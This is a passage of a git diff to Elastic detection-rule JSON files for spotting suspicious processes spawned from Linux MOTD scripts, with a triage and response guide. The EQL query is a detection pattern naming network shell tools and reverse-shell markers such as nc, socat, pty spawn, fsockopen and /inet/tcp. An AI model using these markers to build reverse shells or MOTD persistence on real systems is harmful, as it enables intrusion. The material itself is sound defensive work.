\"lua\", \"java\", \"openssl\", \"ruby\", \"telnet\", \"awk\")\n", "references": [ "https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#10-boot-or-logon-initialization-scripts-motd" @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_5.json b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_5.json index 0030c90a2c1..b04953471db 100644 --- a/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_5.json +++ b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_5.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Process Spawned from MOTD Detected", - "note": "## Triage and analysis\n\n### Investigating Suspicious Process Spawned from MOTD Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Files in these directories will automatically run with root privileges when they are made executable.\n\nThis rule identifies the execution of potentially malicious processes from a MOTD script, which is not likely to occur as default benign behavior. \n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified from which the suspicious process was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services, and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Potential Persistence Through MOTD File Creation Detected - 96d11d31-9a79-480f-8401-da28b194608f\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore them to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Spawned from MOTD Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Files in these directories will automatically run with root privileges when they are made executable.\n\nThis rule identifies the execution of potentially malicious processes from a MOTD script, which is not likely to occur as default benign behavior. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified from which the suspicious process was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services, and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Potential Persistence Through MOTD File Creation Detected - 96d11d31-9a79-480f-8401-da28b194608f\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore them to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"linux\" and \nevent.type == \"start\" and event.action : (\"exec\", \"exec_event\") and\nprocess.parent.executable : (\"/etc/update-motd.d/*\", \"/usr/lib/update-notifier/*\") and\nprocess.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"python*\", \"perl\", \"php*\", \"nc\", \"ncat\", \n\"netcat\", \"socat\", \"lua\", \"java\", \"openssl\", \"ruby\", \"telnet\")\n", "references": [ "https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#10-boot-or-logon-initialization-scripts-motd" @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_6.json b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_6.json index 4a0b5587d9d..dd903d13b6d 100644 --- a/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_6.json +++ b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_6.json @@ -12,8 +12,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Process Spawned from MOTD Detected", - "note": "## Triage and analysis\n\n### Investigating Suspicious Process Spawned from MOTD Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Files in these directories will automatically run with root privileges when they are made executable.\n\nThis rule identifies the execution of potentially malicious processes from a MOTD script, which is not likely to occur as default benign behavior. \n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified from which the suspicious process was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services, and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Potential Persistence Through MOTD File Creation Detected - 96d11d31-9a79-480f-8401-da28b194608f\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore them to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", - "query": "process where event.type == \"start\" and event.action : (\"exec\", \"exec_event\") and\nprocess.parent.executable : (\"/etc/update-motd.d/*\", \"/usr/lib/update-notifier/*\") and (\n (process.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and (\n (process.args : (\"-i\", \"-l\")) or (process.parent.name == \"socat\" and process.parent.args : \"*exec*\"))) or\n (process.name : (\"nc\", \"ncat\", \"netcat\", \"nc.openbsd\") and process.args_count \u003e= 3 and \n not process.args : (\"-*z*\", \"-*l*\")) or\n (process.name : \"python*\" and process.args : \"-c\" and process.args : (\n \"*import*pty*spawn*\", \"*import*subprocess*call*\"\n )) or\n (process.name : \"perl*\" and process.args : \"-e\" and process.args : \"*socket*\" and process.args : (\n \"*exec*\", \"*system*\"\n )) or\n (process.name : \"ruby*\" and process.args : (\"-e\", \"-rsocket\") and process.args : (\n \"*TCPSocket.new*\", \"*TCPSocket.open*\"\n )) or\n (process.name : \"lua*\" and process.args : \"-e\" and process.args : \"*socket.tcp*\" and process.args : (\n \"*io.popen*\", \"*os.execute*\"\n )) or\n (process.name : \"php*\" and process.args : \"-r\" and process.args : \"*fsockopen*\" and process.args : \"*/bin/*sh*\") or \n (process.name : (\"awk\", \"gawk\", \"mawk\", \"nawk\") and process.args : \"*/inet/tcp/*\") or \n (process.name in (\"openssl\", \"telnet\"))\n) and \nnot (process.parent.args : \"--force\" or process.args : (\"/usr/games/lolcat\", \"/usr/bin/screenfetch\"))\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Spawned from MOTD Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Files in these directories will automatically run with root privileges when they are made executable.\n\nThis rule identifies the execution of potentially malicious processes from a MOTD script, which is not likely to occur as default benign behavior. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified from which the suspicious process was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services, and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Potential Persistence Through MOTD File Creation Detected - 96d11d31-9a79-480f-8401-da28b194608f\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore them to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "query": "process where event.type == \"start\" and event.action : (\"exec\", \"exec_event\") and\nprocess.parent.executable : (\"/etc/update-motd.d/*\", \"/usr/lib/update-notifier/*\") and (\n (process.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and (\n (process.args : (\"-i\", \"-l\")) or (process.parent.name == \"socat\" and process.parent.args : \"*exec*\"))) or\n (process.name : (\"nc\", \"ncat\", \"netcat\", \"nc.openbsd\") and process.args_count >= 3 and \n not process.args : (\"-*z*\", \"-*l*\")) or\n (process.name : \"python*\" and process.args : \"-c\" and process.args : (\n \"*import*pty*spawn*\", \"*import*subprocess*call*\"\n )) or\n (process.name : \"perl*\" and process.args : \"-e\" and process.args : \"*socket*\" and process.args : (\n \"*exec*\", \"*system*\"\n )) or\n (process.name : \"ruby*\" and process.args : (\"-e\", \"-rsocket\") and process.args : (\n \"*TCPSocket.new*\", \"*TCPSocket.open*\"\n )) or\n (process.name : \"lua*\" and process.args : \"-e\" and process.args : \"*socket.tcp*\" and process.args : (\n \"*io.popen*\", \"*os.execute*\"\n )) or\n (process.name : \"php*\" and process.args : \"-r\" and process.args : \"*fsockopen*\" and process.args : \"*/bin/*sh*\") or \n (process.name : (\"awk\", \"gawk\", \"mawk\", \"nawk\") and process.args : \"*/inet/tcp/*\") or \n (process.name in (\"openssl\", \"telnet\"))\n) and \nnot (process.parent.args : \"--force\" or process.args : (\"/usr/games/lolcat\", \"/usr/bin/screenfetch\"))\n", "references": [ "https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#10-boot-or-logon-initialization-scripts-motd" ], @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_7.json b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_7.json index 11ffc90daf1..d2678228cd8 100644 --- a/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_7.json +++ b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_7.json @@ -12,8 +12,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Process Spawned from MOTD Detected", - "note": "## Triage and analysis\n\n### Investigating Suspicious Process Spawned from MOTD Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Files in these directories will automatically run with root privileges when they are made executable.\n\nThis rule identifies the execution of potentially malicious processes from a MOTD script, which is not likely to occur as default benign behavior. \n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified from which the suspicious process was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services, and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Potential Persistence Through MOTD File Creation Detected - 96d11d31-9a79-480f-8401-da28b194608f\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore them to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", - "query": "process where event.type == \"start\" and event.action : (\"exec\", \"exec_event\") and\nprocess.parent.executable : (\"/etc/update-motd.d/*\", \"/usr/lib/update-notifier/*\") and (\n (process.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and (\n (process.args : (\"-i\", \"-l\")) or (process.parent.name == \"socat\" and process.parent.args : \"*exec*\"))) or\n (process.name : (\"nc\", \"ncat\", \"netcat\", \"nc.openbsd\") and process.args_count \u003e= 3 and \n not process.args : (\"-*z*\", \"-*l*\")) or\n (process.name : \"python*\" and process.args : \"-c\" and process.args : (\n \"*import*pty*spawn*\", \"*import*subprocess*call*\"\n )) or\n (process.name : \"perl*\" and process.args : \"-e\" and process.args : \"*socket*\" and process.args : (\n \"*exec*\", \"*system*\"\n )) or\n (process.name : \"ruby*\" and process.args : (\"-e\", \"-rsocket\") and process.args : (\n \"*TCPSocket.new*\", \"*TCPSocket.open*\"\n )) or\n (process.name : \"lua*\" and process.args : \"-e\" and process.args : \"*socket.tcp*\" and process.args : (\n \"*io.popen*\", \"*os.execute*\"\n )) or\n (process.name : \"php*\" and process.args : \"-r\" and process.args : \"*fsockopen*\" and process.args : \"*/bin/*sh*\") or \n (process.name : (\"awk\", \"gawk\", \"mawk\", \"nawk\") and process.args : \"*/inet/tcp/*\") or \n (process.name in (\"openssl\", \"telnet\"))\n) and \nnot (process.parent.args : \"--force\" or process.args : (\"/usr/games/lolcat\", \"/usr/bin/screenfetch\"))\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Spawned from MOTD Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Files in these directories will automatically run with root privileges when they are made executable.\n\nThis rule identifies the execution of potentially malicious processes from a MOTD script, which is not likely to occur as default benign behavior. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified from which the suspicious process was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = 